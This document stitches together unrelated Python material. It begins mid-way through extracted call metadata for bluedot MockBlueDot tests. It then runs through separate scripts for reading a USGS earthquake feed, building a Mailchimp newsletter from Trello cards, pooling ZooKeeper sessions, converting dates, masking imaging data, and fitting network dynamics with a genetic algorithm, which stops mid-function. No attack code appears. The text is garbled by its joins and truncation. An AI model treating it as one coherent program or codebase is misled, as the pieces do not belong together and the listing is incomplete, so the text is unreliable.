] | [((224, 237), 'bluedot.MockBlueDot', 'MockBlueDot', ([], {}), '()\n', (235, 237), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((825, 927), 'bluedot.MockBlueDot', 'MockBlueDot', ([], {'device': '"""hci1"""', 'port': '(2)', 'auto_start_server': '(False)', 'print_messages': '(False)', 'cols': '(3)', 'rows': '(2)'}), "(device='hci1', port=2, auto_start_server=False, print_messages=\n False, cols=3, rows=2)\n", (836, 927), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((1454, 1490), 'bluedot.MockBlueDot', 'MockBlueDot', ([], {'auto_start_server': '(False)'}), '(auto_start_server=False)\n', (1465, 1490), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((1643, 1656), 'bluedot.MockBlueDot', 'MockBlueDot', ([], {}), '()\n', (1654, 1656), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((1901, 1914), 'bluedot.MockBlueDot', 'MockBlueDot', ([], {}), '()\n', (1912, 1914), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((1936, 1943), 'threading.Event', 'Event', ([], {}), '()\n', (1941, 1943), False, 'from threading import Event, Thread\n'), ((2027, 2034), 'threading.Event', 'Event', ([], {}), '()\n', (2032, 2034), False, 'from threading import Event, Thread\n'), ((2375, 2388), 'bluedot.MockBlueDot', 'MockBlueDot', ([], {}), '()\n', (2386, 2388), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((2410, 2417), 'threading.Event', 'Event', ([], {}), '()\n', (2415, 2417), False, 'from threading import Event, Thread\n'), ((2544, 2551), 'threading.Event', 'Event', ([], {}), '()\n', (2549, 2551), False, 'from threading import Event, Thread\n'), ((3047, 3060), 'bluedot.MockBlueDot', 'MockBlueDot', ([], {}), '()\n', (3058, 3060), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((3212, 3225), 'bluedot.MockBlueDot', 'MockBlueDot', ([], {}), '()\n', (3223, 3225), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((4627, 4640), 'bluedot.MockBlueDot', 'MockBlueDot', ([], {}), '()\n', (4638, 4640), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((6694, 6707), 'bluedot.MockBlueDot', 'MockBlueDot', ([], {}), '()\n', (6705, 6707), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((8046, 8059), 'bluedot.MockBlueDot', 'MockBlueDot', ([], {}), '()\n', (8057, 8059), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((10117, 10130), 'bluedot.MockBlueDot', 'MockBlueDot', ([], {}), '()\n', (10128, 10130), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((11761, 11774), 'bluedot.MockBlueDot', 'MockBlueDot', ([], {}), '()\n', (11772, 11774), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((13729, 13742), 'bluedot.MockBlueDot', 'MockBlueDot', ([], {}), '()\n', (13740, 13742), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((16420, 16433), 'bluedot.MockBlueDot', 'MockBlueDot', ([], {}), '()\n', (16431, 16433), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((16821, 16834), 'bluedot.MockBlueDot', 'MockBlueDot', ([], {}), '()\n', (16832, 16834), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((18542, 18555), 'bluedot.MockBlueDot', 'MockBlueDot', ([], {}), '()\n', (18553, 18555), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((18672, 18685), 
'bluedot.MockBlueDot', 'MockBlueDot', ([], {}), '()\n', (18683, 18685), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((18893, 18906), 'bluedot.MockBlueDot', 'MockBlueDot', ([], {}), '()\n', (18904, 18906), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((20212, 20225), 'bluedot.MockBlueDot', 'MockBlueDot', ([], {}), '()\n', (20223, 20225), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((20986, 21037), 'threading.Thread', 'Thread', ([], {'target': '_delayed_function', 'args': '(func, time)'}), '(target=_delayed_function, args=(func, time))\n', (20992, 21037), False, 'from threading import Event, Thread\n'), ((21109, 21120), 'time.sleep', 'sleep', (['time'], {}), '(time)\n', (21114, 21120), False, 'from time import sleep\n'), ((4807, 4841), 'time.sleep', 'sleep', (['(mbd.double_press_time + 0.1)'], {}), '(mbd.double_press_time + 0.1)\n', (4812, 4841), False, 'from time import sleep\n'), ((5089, 5123), 'time.sleep', 'sleep', (['(mbd.double_press_time + 0.1)'], {}), '(mbd.double_press_time + 0.1)\n', (5094, 5123), False, 'from time import sleep\n'), ((5227, 5261), 'time.sleep', 'sleep', (['(mbd.double_press_time + 0.1)'], {}), '(mbd.double_press_time + 0.1)\n', (5232, 5261), False, 'from time import sleep\n'), ((5456, 5463), 'threading.Event', 'Event', ([], {}), '()\n', (5461, 5463), False, 'from threading import Event, Thread\n'), ((6200, 6207), 'threading.Event', 'Event', ([], {}), '()\n', (6205, 6207), False, 'from threading import Event, Thread\n'), ((6839, 6846), 'threading.Event', 'Event', ([], {}), '()\n', (6844, 6846), False, 'from threading import Event, Thread\n'), ((6963, 6970), 'threading.Event', 'Event', ([], {}), '()\n', (6968, 6970), False, 'from threading import Event, Thread\n'), ((7083, 7090), 'threading.Event', 'Event', ([], {}), '()\n', (7088, 7090), False, 'from threading import Event, Thread\n'), ((7191, 7198), 'threading.Event', 'Event', ([], {}), '()\n', (7196, 7198), False, 'from threading import Event, Thread\n'), ((8203, 8210), 'threading.Event', 'Event', ([], {}), '()\n', (8208, 8210), False, 'from threading import Event, Thread\n'), ((8366, 8373), 'threading.Event', 'Event', ([], {}), '()\n', (8371, 8373), False, 'from threading import Event, Thread\n'), ((8533, 8540), 'threading.Event', 'Event', ([], {}), '()\n', (8538, 8540), False, 'from threading import Event, Thread\n'), ((8680, 8687), 'threading.Event', 'Event', ([], {}), '()\n', (8685, 8687), False, 'from threading import Event, Thread\n'), ((14351, 14358), 'threading.Event', 'Event', ([], {}), '()\n', (14356, 14358), False, 'from threading import Event, Thread\n'), ((14634, 14673), 'bluedot.BlueDotSwipe', 'BlueDotSwipe', (['mbd[col, row].interaction'], {}), '(mbd[col, row].interaction)\n', (14646, 14673), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((14940, 14979), 'bluedot.BlueDotSwipe', 'BlueDotSwipe', (['mbd[col, row].interaction'], {}), '(mbd[col, row].interaction)\n', (14952, 14979), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((15246, 15285), 'bluedot.BlueDotSwipe', 'BlueDotSwipe', (['mbd[col, row].interaction'], {}), '(mbd[col, row].interaction)\n', (15258, 15285), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((15552, 15591), 'bluedot.BlueDotSwipe', 'BlueDotSwipe', (['mbd[col, row].interaction'], {}), '(mbd[col, row].interaction)\n', (15564, 15591), False, 'from bluedot import MockBlueDot, BlueDotSwipe, 
BlueDotRotation\n'), ((16925, 16932), 'threading.Event', 'Event', ([], {}), '()\n', (16930, 16932), False, 'from threading import Event, Thread\n'), ((17176, 17247), 'bluedot.BlueDotRotation', 'BlueDotRotation', (['mbd[col, row].interaction', 'mbd[0, 0].rotation_segments'], {}), '(mbd[col, row].interaction, mbd[0, 0].rotation_segments)\n', (17191, 17247), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((17522, 17597), 'bluedot.BlueDotRotation', 'BlueDotRotation', (['mbd[col, row].interaction', 'mbd[col, row].rotation_segments'], {}), '(mbd[col, row].interaction, mbd[col, row].rotation_segments)\n', (17537, 17597), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((17870, 17945), 'bluedot.BlueDotRotation', 'BlueDotRotation', (['mbd[col, row].interaction', 'mbd[col, row].rotation_segments'], {}), '(mbd[col, row].interaction, mbd[col, row].rotation_segments)\n', (17885, 17945), False, 'from bluedot import MockBlueDot, BlueDotSwipe, BlueDotRotation\n'), ((18570, 18603), 'pytest.raises', 'pytest.raises', (['ButtonDoesNotExist'], {}), '(ButtonDoesNotExist)\n', (18583, 18603), False, 'import pytest\n'), ((16202, 16209), 'threading.Event', 'Event', ([], {}), '()\n', (16207, 16209), False, 'from threading import Event, Thread\n')] |
import urllib.request
import json #needed to be able to work with JSON files
def manipularJson():
    endereco="http://earthquake.usgs.gov/earthquakes/feed/v1.0/summary/2.5_day.geojson"
    webUrl=urllib.request.urlopen(endereco)
    if(webUrl.getcode()==200): #check the HTTP status code of the url
        dados=webUrl.read() #read the data from the url
        oJSON=json.loads(dados) #load the JSON data
    contagem= oJSON["metadata"]["count"]#contagem receives the count value from the JSON metadata
    print("contagem :"+str(contagem))
    for local in oJSON["features"]:#print every entry of the features array
print(local["properties"]["place"]) | [
"json.loads"
] | [((411, 428), 'json.loads', 'json.loads', (['dados'], {}), '(dados)\n', (421, 428), False, 'import json\n')] |
from trello import TrelloClient
from datetime import datetime
from sys import exit, argv
from mailchimp_marketing import Client
from mailchimp_marketing.api_client import ApiClientError
from bs4 import BeautifulSoup
import markdown
from mdx_gfm import GithubFlavoredMarkdownExtension
import config
def debug_out(str):
if config.debug:
print("-- %s" % str)
if len(argv) != 2 or argv[1] not in ["preview", "final"]:
print("Usage: newsletter.py [preview|final]")
exit(1)
newsletter_type = argv[1]
def getTrelloCards():
client = TrelloClient(
api_key=config.api_key,
api_secret=config.api_secret,
token=config.token,
token_secret=config.token_secret
)
org_name = config.org_name
brd_name = config.brd_name
list_name = datetime.now().strftime("%Y-%V")
orgs = list(filter(lambda x: x.name == org_name,
client.list_organizations()))
if len(orgs) != 1:
print("Error while filtering organzation")
exit(1)
debug_out("Organization found")
brds = list(filter(lambda x: x.name == brd_name,
orgs[0].get_boards("open")))
if len(brds) != 1:
print("Error while filtering boards")
exit(1)
debug_out("Board found")
lists = list(filter(lambda x: x.name == list_name,
brds[0].get_lists("open")))
if len(lists) != 1:
print("Error while filtering lists")
exit(1)
cards = lists[0].list_cards()
debug_out("List found, with %s cards" % len(cards))
if len(cards) == 0:
print("Not sending empty newsletter")
exit(1)
return cards
def sendNewsletter(items, newsletter_type):
subject = datetime.now().strftime("MuMaNews - CW %V")
title = "%s %s" % (datetime.now().strftime("%Y-%V"), newsletter_type)
try:
client = Client()
client.set_config({
"api_key": config.mailchimp_api_key,
"server": config.mailchimp_server
})
response = client.campaigns.create({
"type": "regular",
"recipients": {
"list_id": config.mailchimp_list_id
},
"settings": {
"template_id": config.mailchimp_template_id,
"subject_line": subject,
"title": title,
"from_name": config.MAIL_FROM_NAME,
"reply_to": config.MAIL_FROM
}
})
# print(response)
campaign_id = response["id"]
debug_out("Mailchimp Campaign: %s / %s" % (campaign_id, response["web_id"]))
response = client.campaigns.get_content(campaign_id)
soup = BeautifulSoup(response["html"], "html.parser")
template_elem_src = soup.find(
string="%TITLE%").find_parent(class_="mcnTextBlock")
template_txt = str(template_elem_src)
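        # clone the %TITLE%/%CONTENT% template block for every Trello card, rendering the description from markdown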
output = []
for item in items:
txt = template_txt.replace("%TITLE%", item.name)
txt = txt.replace("%CONTENT%", markdown.markdown(item.description,extensions=[GithubFlavoredMarkdownExtension()]))
output.append(txt)
new_elem = BeautifulSoup("".join(output), "html.parser")
template_elem_src.replace_with(new_elem)
response = client.campaigns.set_content(campaign_id, {
"html": str(soup)
})
if newsletter_type == "preview":
response = client.campaigns.send_test_email(
campaign_id, {"test_emails": [ config.MAIL_TO_PREVIEW ], "send_type": "html"})
debug_out(str(response))
else:
response = client.campaigns.send(campaign_id)
debug_out(str(response))
except ApiClientError as error:
print("Error: {}".format(error.text))
items = getTrelloCards()
sendNewsletter(items, newsletter_type)
| [
"mailchimp_marketing.Client",
"trello.TrelloClient",
"datetime.datetime.now",
"bs4.BeautifulSoup",
"sys.exit",
"mdx_gfm.GithubFlavoredMarkdownExtension"
] | [((484, 491), 'sys.exit', 'exit', (['(1)'], {}), '(1)\n', (488, 491), False, 'from sys import exit, argv\n'), ((555, 680), 'trello.TrelloClient', 'TrelloClient', ([], {'api_key': 'config.api_key', 'api_secret': 'config.api_secret', 'token': 'config.token', 'token_secret': 'config.token_secret'}), '(api_key=config.api_key, api_secret=config.api_secret, token=\n config.token, token_secret=config.token_secret)\n', (567, 680), False, 'from trello import TrelloClient\n'), ((1016, 1023), 'sys.exit', 'exit', (['(1)'], {}), '(1)\n', (1020, 1023), False, 'from sys import exit, argv\n'), ((1244, 1251), 'sys.exit', 'exit', (['(1)'], {}), '(1)\n', (1248, 1251), False, 'from sys import exit, argv\n'), ((1468, 1475), 'sys.exit', 'exit', (['(1)'], {}), '(1)\n', (1472, 1475), False, 'from sys import exit, argv\n'), ((1651, 1658), 'sys.exit', 'exit', (['(1)'], {}), '(1)\n', (1655, 1658), False, 'from sys import exit, argv\n'), ((1881, 1889), 'mailchimp_marketing.Client', 'Client', ([], {}), '()\n', (1887, 1889), False, 'from mailchimp_marketing import Client\n'), ((2707, 2753), 'bs4.BeautifulSoup', 'BeautifulSoup', (["response['html']", '"""html.parser"""'], {}), "(response['html'], 'html.parser')\n", (2720, 2753), False, 'from bs4 import BeautifulSoup\n'), ((794, 808), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (806, 808), False, 'from datetime import datetime\n'), ((1737, 1751), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1749, 1751), False, 'from datetime import datetime\n'), ((1804, 1818), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1816, 1818), False, 'from datetime import datetime\n'), ((3104, 3137), 'mdx_gfm.GithubFlavoredMarkdownExtension', 'GithubFlavoredMarkdownExtension', ([], {}), '()\n', (3135, 3137), False, 'from mdx_gfm import GithubFlavoredMarkdownExtension\n')] |
# -*- coding: utf-8 -*-
import atexit
import contextlib
import logging
import time
from collections import deque
from kazoo.client import KazooClient
from app import load_app_config
from app.exc import GulDanException
logger = logging.getLogger(__name__)
class Session(object):
def __init__(self, conn, timeout):
self.conn = conn
self.timeout = timeout
self.created_at = time.time()
def should_close(self):
if not self.conn.connected:
return True
return self.created_at + self.timeout < time.time()
def start(self):
self.conn.start()
def close(self):
self.conn.stop()
self.conn.close()
class ZKManager(object):
def __init__(self, zk_config, initial_conns=3, max_conns=10, session_timeout=300):
self.zksessions = deque()
self.zk_config = zk_config
self.initial_conns = initial_conns
self.max_conns = max_conns
self.session_timeout = session_timeout
def create_zk_sessions(self):
for i in range(self.initial_conns):
self.add_session(self.zk_config)
def add_session(self, zk_config):
if len(self.zksessions) > self.max_conns:
return
conn = KazooClient(**zk_config)
session = Session(conn, self.session_timeout)
self.zksessions.append(session)
session.start()
def _acquire_session(self):
session = None
while self.zksessions:
session = self.zksessions.pop()
if session.should_close():
session.close()
self.add_session(self.zk_config)
logger.warning("zk conn time out ,create a new one")
session = None
else:
break
return session
def return_session(self, session):
self.zksessions.append(session)
@contextlib.contextmanager
def zk_session_ctx(self):
session = None
try:
session = self._acquire_session()
if not session:
                raise GulDanException().with_code(500).with_message(u"unable to connect to zookeeper")
yield session
        finally:
            if session is not None:
                self.return_session(session)
def is_path_existing(self, path):
with self.zk_session_ctx() as session:
if session.conn.exists(path):
return True
return False
def close_sessions(self):
for s in self.zksessions:
s.close()
app_config = load_app_config()
zk_manager = ZKManager(
app_config.ZK_CONN_CONFIG,
**app_config.ZK_MANAGER_CONFIG
)
atexit.register(zk_manager.close_sessions)
| [
"logging.getLogger",
"collections.deque",
"kazoo.client.KazooClient",
"app.load_app_config",
"app.exc.GulDanException",
"time.time",
"atexit.register"
] | [((230, 257), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (247, 257), False, 'import logging\n'), ((2503, 2520), 'app.load_app_config', 'load_app_config', ([], {}), '()\n', (2518, 2520), False, 'from app import load_app_config\n'), ((2615, 2657), 'atexit.register', 'atexit.register', (['zk_manager.close_sessions'], {}), '(zk_manager.close_sessions)\n', (2630, 2657), False, 'import atexit\n'), ((403, 414), 'time.time', 'time.time', ([], {}), '()\n', (412, 414), False, 'import time\n'), ((826, 833), 'collections.deque', 'deque', ([], {}), '()\n', (831, 833), False, 'from collections import deque\n'), ((1242, 1266), 'kazoo.client.KazooClient', 'KazooClient', ([], {}), '(**zk_config)\n', (1253, 1266), False, 'from kazoo.client import KazooClient\n'), ((553, 564), 'time.time', 'time.time', ([], {}), '()\n', (562, 564), False, 'import time\n'), ((2074, 2091), 'app.exc.GulDanException', 'GulDanException', ([], {}), '()\n', (2089, 2091), False, 'from app.exc import GulDanException\n')] |
# Generated by Django 4.0.3 on 2022-04-08 17:05
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0005_alter_profile_accuracy_and_more'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='accuracy',
field=models.FloatField(default=0),
),
migrations.AlterField(
model_name='profile',
name='average_solving_time',
field=models.FloatField(default=0),
),
]
| [
"django.db.models.FloatField"
] | [((353, 381), 'django.db.models.FloatField', 'models.FloatField', ([], {'default': '(0)'}), '(default=0)\n', (370, 381), False, 'from django.db import migrations, models\n'), ((518, 546), 'django.db.models.FloatField', 'models.FloatField', ([], {'default': '(0)'}), '(default=0)\n', (535, 546), False, 'from django.db import migrations, models\n')] |
"""
Utility class to convert time formats
"""
import re
from datetime import datetime
from pytz import timezone
from ros import DAY_FORMAT, STANDARD_TIMEZONE_STR
class IntuitiveDateConverter:
"""
Handle common date formats of this project and convert as needed.
"""
@staticmethod
def to_datetime(d: object) -> datetime:
"""
Take in common date formats of this project and convert to datetime
"""
if type(d) == datetime:
return d
if type(d) == str:
if len(d) == 10:
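                # dashes at positions 4 and 7 mean the string looks like a '%Y-%m-%d' day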
if [i.start() for i in re.finditer('-', d)] == [4, 7]:
converted = datetime.strptime(d, DAY_FORMAT)
return converted
if type(d) in (float, int):
if d > 1e9:
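                # values above ~1e12 are taken to be epoch milliseconds and scaled to seconds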
if d > 1e12:
d /= 1000.0
converted = datetime.fromtimestamp(d).astimezone(timezone(STANDARD_TIMEZONE_STR))
return converted
        raise ValueError(f'Intuitive date conversion not implemented for this format/type. Passed input: {d}')
@staticmethod
    def to_day_str(d: object) -> str:
"""
Take in common date formats of this project and convert to a day str of format '%Y-%m-%d'
"""
if type(d) == datetime:
return d.strftime(DAY_FORMAT)
if type(d) == str:
if len(d) == 10:
if [i.start() for i in re.finditer('-', d)] == [4, 7]:
return d
if type(d) in (float, int):
if d > 1e9:
if d > 1e12:
d /= 1000.0
converted = datetime.fromtimestamp(d).astimezone(timezone(STANDARD_TIMEZONE_STR)).strftime(DAY_FORMAT)
return converted
        raise ValueError(f'Intuitive date conversion not implemented for this format/type. Passed input: {d}')
@staticmethod
    def to_epoch_s(d: object) -> float:
"""
Take in common date formats of this project and convert to an epoch (s)
"""
if type(d) == datetime:
return d.timestamp()
if type(d) == str:
if len(d) == 10:
if [i.start() for i in re.finditer('-', d)] == [4, 7]:
converted = datetime.strptime(d, DAY_FORMAT).timestamp()
return converted
if type(d) in (float, int):
if d > 1e9:
if d > 1e12:
d /= 1000.0
return d
        raise ValueError(f'Intuitive date conversion not implemented for this format/type. Passed input: {d}')
| [
"datetime.datetime.strptime",
"pytz.timezone",
"datetime.datetime.fromtimestamp",
"re.finditer"
] | [((661, 693), 'datetime.datetime.strptime', 'datetime.strptime', (['d', 'DAY_FORMAT'], {}), '(d, DAY_FORMAT)\n', (678, 693), False, 'from datetime import datetime\n'), ((919, 950), 'pytz.timezone', 'timezone', (['STANDARD_TIMEZONE_STR'], {}), '(STANDARD_TIMEZONE_STR)\n', (927, 950), False, 'from pytz import timezone\n'), ((882, 907), 'datetime.datetime.fromtimestamp', 'datetime.fromtimestamp', (['d'], {}), '(d)\n', (904, 907), False, 'from datetime import datetime\n'), ((596, 615), 're.finditer', 're.finditer', (['"""-"""', 'd'], {}), "('-', d)\n", (607, 615), False, 'import re\n'), ((1452, 1471), 're.finditer', 're.finditer', (['"""-"""', 'd'], {}), "('-', d)\n", (1463, 1471), False, 'import re\n'), ((1701, 1732), 'pytz.timezone', 'timezone', (['STANDARD_TIMEZONE_STR'], {}), '(STANDARD_TIMEZONE_STR)\n', (1709, 1732), False, 'from pytz import timezone\n'), ((2228, 2247), 're.finditer', 're.finditer', (['"""-"""', 'd'], {}), "('-', d)\n", (2239, 2247), False, 'import re\n'), ((2293, 2325), 'datetime.datetime.strptime', 'datetime.strptime', (['d', 'DAY_FORMAT'], {}), '(d, DAY_FORMAT)\n', (2310, 2325), False, 'from datetime import datetime\n'), ((1664, 1689), 'datetime.datetime.fromtimestamp', 'datetime.fromtimestamp', (['d'], {}), '(d)\n', (1686, 1689), False, 'from datetime import datetime\n')] |
import numpy as np
from .aux_funcs import stack_duplicate_frames, resolve_thresholdOnValue
from view.python_core.foto import get_foto1_data
class Mask(object):
def __init__(self, area_masker, threshold_masker):
super().__init__()
self.area_masker = area_masker
self.threshold_masker = threshold_masker
def get_mask_2D(self, data):
return self.area_masker.get_area_mask_2D() & self.threshold_masker.get_thresh_mask_2D(data)
def get_mask_3D(self, data):
return self.area_masker.get_area_mask_3D() & self.threshold_masker.get_thresh_mask_3D(data)
def get_mask(self, data):
if len(data.shape) == 2:
return self.get_mask_2D(data)
elif len(data.shape) == 3:
return self.get_mask_3D(data)
class AreaMaskBlank(object):
def __init__(self, movie_size):
super().__init__()
self.movie_size = movie_size
def get_area_mask_3D(self):
return np.ones(self.movie_size, dtype=bool)
def get_area_mask_2D(self):
return np.ones(self.movie_size[:2], dtype=bool)
class AreaMask(AreaMaskBlank):
def __init__(self, movie_size, frame_mask):
super().__init__(movie_size)
self.area_mask = frame_mask
def get_area_mask_3D(self):
return stack_duplicate_frames(self.area_mask, self.movie_size[2])
def get_area_mask_2D(self):
return self.area_mask
def apply_threshold(threshold_on, threshold_pos, threshold_neg):
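    # keep values above the (resolved) positive threshold or below the (resolved) negative threshold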
threshold_pos = resolve_thresholdOnValue(threshold_on, threshold_pos)
threshold_neg = resolve_thresholdOnValue(threshold_on, threshold_neg)
return (threshold_on > threshold_pos) | (threshold_on < threshold_neg)
class ThresholdMaskBlank(object):
def __init__(self, data_size):
super().__init__()
self.data_size = data_size
def get_thresh_mask_2D(self, data):
return np.ones(self.data_size[:2], dtype=bool)
def get_thresh_mask_3D(self, data):
frame_mask = self.get_thresh_mask_2D(data)
return stack_duplicate_frames(frame_mask, self.data_size[2])
class ThresholdMaskStatic(ThresholdMaskBlank):
def __init__(self, threshold_on, threshold_pos, threshold_neg, data_size):
super().__init__(data_size)
self.thresh_mask = apply_threshold(threshold_on, threshold_pos, threshold_neg)
def get_thresh_mask_2D(self, data):
return self.thresh_mask
class ThresholdMaskDynamic(ThresholdMaskBlank):
def __init__(self, threshold_on, threshold_pos, threshold_neg, data_size):
super().__init__(data_size)
self.thresh_mask = apply_threshold(threshold_on, threshold_pos, threshold_neg)
def get_thresh_mask_2D(self, data):
raise AttributeError("ThresholdMaskDynamic object cannot generate a 2D mask, it should only be used "
"to threshold on 3D data")
def get_thresh_mask_3D(self, data):
return self.thresh_mask
class ThresholdMaskRunTime(ThresholdMaskBlank):
def __init__(self, threshold_pos, threshold_neg, data_size):
super().__init__(data_size)
self.threshold_pos = threshold_pos
self.threshold_neg = threshold_neg
def get_thresh_mask_2D(self, data):
return apply_threshold(data, threshold_pos=self.threshold_pos, threshold_neg=self.threshold_neg)
def get_thresh_mask_3D(self, data):
return apply_threshold(data, threshold_pos=self.threshold_pos, threshold_neg=self.threshold_neg)
def get_thresholder_3D(flags, p1, area_mask_excluded, excluder):
revised_movie_size = excluder.revise_movie_size((p1.metadata.format_x, p1.metadata.format_y, p1.metadata.frames))
if flags["mv_withinArea"]:
area_masker = AreaMask(movie_size=revised_movie_size, frame_mask=area_mask_excluded)
else:
area_masker = AreaMaskBlank(movie_size=revised_movie_size)
mv_thresholdPos = flags["mv_lowerThreshPositiveResps"]
mv_thresholdNeg = flags["mv_upperThreshNegativeResps"]
if flags["mv_thresholdOn"] in ("none", "None", "NONE"):
threshold_masker = ThresholdMaskBlank(data_size=revised_movie_size)
elif flags["mv_thresholdOn"] == "foto1":
foto1_data = get_foto1_data(flags, p1)
threshold_masker = ThresholdMaskStatic(data_size=revised_movie_size, threshold_on=foto1_data,
threshold_pos=mv_thresholdPos, threshold_neg=mv_thresholdNeg)
elif flags["mv_thresholdOn"] == "raw1":
threshold_masker = ThresholdMaskDynamic(data_size=revised_movie_size, threshold_on=p1.raw1,
threshold_pos=mv_thresholdPos, threshold_neg=mv_thresholdNeg)
elif flags["mv_thresholdOn"] == "sig1":
threshold_masker = ThresholdMaskDynamic(data_size=revised_movie_size, threshold_on=p1.sig1,
threshold_pos=mv_thresholdPos, threshold_neg=mv_thresholdNeg)
else:
raise NotImplementedError
return Mask(area_masker=area_masker, threshold_masker=threshold_masker)
def get_thresholder_2D(flags, p1, area_mask_excluded, excluder):
revised_movie_size = excluder.revise_frame_size((p1.metadata.format_x, p1.metadata.format_y))
if flags["SO_withinArea"]:
area_masker = AreaMask(movie_size=revised_movie_size, frame_mask=area_mask_excluded)
else:
area_masker = AreaMaskBlank(movie_size=revised_movie_size)
so_thresholdPos = flags["SO_lowerThreshPositiveResps"]
so_thresholdNeg = flags["SO_upperThreshNegativeResps"]
if flags["SO_thresholdOn"] in ("none", "None", "NONE"):
threshold_masker = ThresholdMaskBlank(data_size=revised_movie_size)
elif flags["SO_thresholdOn"] == "foto1":
foto1_data = get_foto1_data(flags, p1)
threshold_masker = ThresholdMaskStatic(data_size=revised_movie_size, threshold_on=foto1_data,
threshold_pos=so_thresholdPos, threshold_neg=so_thresholdNeg)
elif flags["SO_thresholdOn"] == "overview":
threshold_masker = ThresholdMaskRunTime(data_size=revised_movie_size, threshold_pos=so_thresholdPos,
threshold_neg=so_thresholdNeg)
else:
raise NotImplementedError(f"The value of the flag 'SO_thresholdOn' was set to {flags['SO_thresholdOn']}"
f", which is invalid. Valid values are 'foto1' and 'overview'. Look at the VIEW wiki "
f"for more information")
return Mask(area_masker=area_masker, threshold_masker=threshold_masker)
| [
"numpy.ones",
"view.python_core.foto.get_foto1_data"
] | [((969, 1005), 'numpy.ones', 'np.ones', (['self.movie_size'], {'dtype': 'bool'}), '(self.movie_size, dtype=bool)\n', (976, 1005), True, 'import numpy as np\n'), ((1055, 1095), 'numpy.ones', 'np.ones', (['self.movie_size[:2]'], {'dtype': 'bool'}), '(self.movie_size[:2], dtype=bool)\n', (1062, 1095), True, 'import numpy as np\n'), ((1904, 1943), 'numpy.ones', 'np.ones', (['self.data_size[:2]'], {'dtype': 'bool'}), '(self.data_size[:2], dtype=bool)\n', (1911, 1943), True, 'import numpy as np\n'), ((4211, 4236), 'view.python_core.foto.get_foto1_data', 'get_foto1_data', (['flags', 'p1'], {}), '(flags, p1)\n', (4225, 4236), False, 'from view.python_core.foto import get_foto1_data\n'), ((5768, 5793), 'view.python_core.foto.get_foto1_data', 'get_foto1_data', (['flags', 'p1'], {}), '(flags, p1)\n', (5782, 5793), False, 'from view.python_core.foto import get_foto1_data\n')] |
import numpy as np
import random
# experiment 4: static number of statements, coefficients, discrete genes, complex dynamical network
# sample results:
# -0.005886 + -0.998262 * xi^1.499023 + 1.007844 * sum Aij * xi^0.467529 * xj^0.521240
# -0.001100 + -0.999386 * xi^1.500244 + 0.997469 * sum Aij * xi^0.500488 * xj^0.501709
NUMBER_OF_NODES = 5
DELTA_T = 0.01
TIME_FRAMES = 100
CHROMOSOME_SIZE = 3
GENE_SIZE = 12 # bits
MUTATION_CHANCE = 0.1
POPULATION = 100
CHILDREN = 10
ITERATIONS = 10000
POWER_RANGE = (0, 5)
STEP = (POWER_RANGE[1] - POWER_RANGE[0]) / 2 ** GENE_SIZE
class Individual:
def __init__(self, chromosome, x, y, adjacency_matrix):
self.coefficients = None
self.chromosome = chromosome
self.fitness = self._calculate_fitness(x, y, adjacency_matrix)
def _get_theta(self, x, adjacency_matrix):
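        # build the least-squares design matrix per node: a constant column, x_i^p0, and the coupling term sum_j Aij * x_i^p1 * x_j^p2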
theta_list = []
for node_index in range(NUMBER_OF_NODES):
x_i = x[:TIME_FRAMES, node_index]
column_list = [
np.ones(TIME_FRAMES),
x_i ** self.powers[0],
]
terms = []
for j in range(NUMBER_OF_NODES):
if j != node_index and adjacency_matrix[j, node_index]:
x_j = x[:TIME_FRAMES, j]
terms.append(
adjacency_matrix[j, node_index] * x_i ** self.powers[1] * x_j ** self.powers[2])
if terms:
column = np.sum(terms, axis=0)
column_list.append(column)
theta = np.column_stack(column_list)
theta_list.append(theta)
return np.concatenate(theta_list)
def _calculate_mse(self, x, y, adjacency_matrix):
powers = []
for i in range(CHROMOSOME_SIZE):
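            # decode each GENE_SIZE-bit gene into an exponent inside POWER_RANGE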
binary = 0
for j in range(GENE_SIZE):
binary += self.chromosome[i * GENE_SIZE + j] * 2 ** (GENE_SIZE - j - 1)
power = POWER_RANGE[0] + binary * STEP
powers.append(power)
self.powers = powers
theta = self._get_theta(x, adjacency_matrix)
stacked_y = np.concatenate([y[:, node_index] for node_index in range(NUMBER_OF_NODES)])
coefficients = np.linalg.lstsq(theta, stacked_y, rcond=None)[0]
self.coefficients = coefficients
y_hat = np.matmul(theta, coefficients.T)
